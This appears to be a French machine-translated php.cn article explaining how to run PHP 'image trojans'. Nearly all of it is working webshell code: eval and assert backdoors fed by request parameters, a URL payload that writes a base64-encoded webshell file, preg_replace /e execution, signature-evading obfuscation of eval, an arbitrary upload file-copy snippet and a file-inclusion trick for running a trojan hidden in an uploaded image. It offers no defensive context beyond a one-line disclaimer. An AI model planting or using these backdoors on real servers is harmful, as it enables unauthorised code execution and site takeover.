Maison > développement back-end > Problème PHP > Comment exécuter un cheval de Troie d'image php

Comment exécuter un cheval de Troie d'image php

王林
Libérer: 2023-02-24 12:52:02
original
12637 Les gens l'ont consulté

Comment exécuter un cheval de Troie d'image php

Comment exécuter un cheval de Troie d'image PHP

1 Méthode d'écriture standard, exécutez le code PHP directement via eval

@eval ($_POST['code']);
Copier après la connexion

2. Exécutez dynamiquement assert pour générer un fichier cheval de Troie (le meilleur caché)

@$_GET['a']($_GET['code']);
Copier après la connexion

3. dans les paramètres suivants et en cours d'exécution, un fichier c.php sera généré dans le répertoire courant

/index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,
base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
Copier après la connexion

Lorsque le paramètre a est eval, une erreur sera signalée (car eval n'est pas un fonction). La génération du cheval de Troie échoue et elle est affirmée. La même erreur sera signalée, mais un cheval de Troie sera généré.


4. Utilisez preg_replace pour exécuter le code (utilisez simplement une chaîne arbitraire devant lui. Si elle est différente, la commande peut être exécutée plusieurs fois)

@preg_replace("/re/e", $_POST['code'], "re");
Copier après la connexion

5. Rompre les signatures

session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
Copier après la connexion

6 Renommez n'importe quel fichier

$reg="c"."o"."p"."y";
$reg($_FILES['filename']['tmp_name'],$_FILES['filename']['name']);
Copier après la connexion

Comment utiliser la vulnérabilité d'inclusion.

Parfois, nous téléchargeons des chevaux de Troie d'images mais ils ne peuvent pas être exécutés pour le moment. S'il existe une vulnérabilité d'inclusion, les chevaux de Troie d'images peuvent être exécutés.

S'il y a un include($_GET['controller']) dans le code php et qu'il y a un chemin url : /index.php?controller=user, cela semble être un contrôle correspondant exécuté basé sur inclusion des paramètres. Le code du serveur, mais si les paramètres dans le chemin de l'URL sont modifiés comme suit : /index.php?uid=/upload/images/muma.jpg, le cheval de Troie sera exécuté à ce moment-là.

Le contenu ci-dessus est à titre de référence uniquement !

Tutoriel recommandé :

Tutoriel vidéo PHP

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Étiquettes associées:
source:php.cn
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal